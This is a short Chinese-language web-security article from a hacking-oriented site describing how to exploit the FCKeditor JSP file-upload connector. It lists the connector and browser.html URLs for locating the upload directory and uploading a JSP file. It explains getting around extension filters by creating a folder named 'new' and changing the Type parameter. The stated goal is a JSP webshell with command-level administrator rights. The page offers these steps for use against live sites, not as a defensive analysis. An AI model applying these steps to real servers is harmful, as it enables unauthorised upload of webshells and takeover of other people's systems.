安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > Fckeditor jsp版漏洞利用方法2010

Fckeditor jsp版漏洞利用方法2010

时间:2018-11-22来源:未知 作者:安云网点击:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUploadType=ImageCurrentFolder=%2F 用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图 注意红框的地方,是上传后图片存放的地址。 然后
//内容来自安云网

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F //内容来自安云网


//内容来自安云网

用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图 //内容来自AnYun.ORG


注意红框的地方,是上传后图片存放的地址。


然后用


http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector


这个地址上传jsp文件,如果网站对上传文件的后缀作了限制,那么就新建一个名字为new的文件夹,修改上面url中的Type=Image为Type=new,把文件上传到这个文件夹,这个文件夹一般就不会对文件后缀作限制了。如图:


如果一切正常的话,利用这个Fckeditor 的漏洞所获得的jsp webshell应该有cmd管理员权限


本文标题: Fckeditor jsp版漏洞利用方法2010 安云网
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容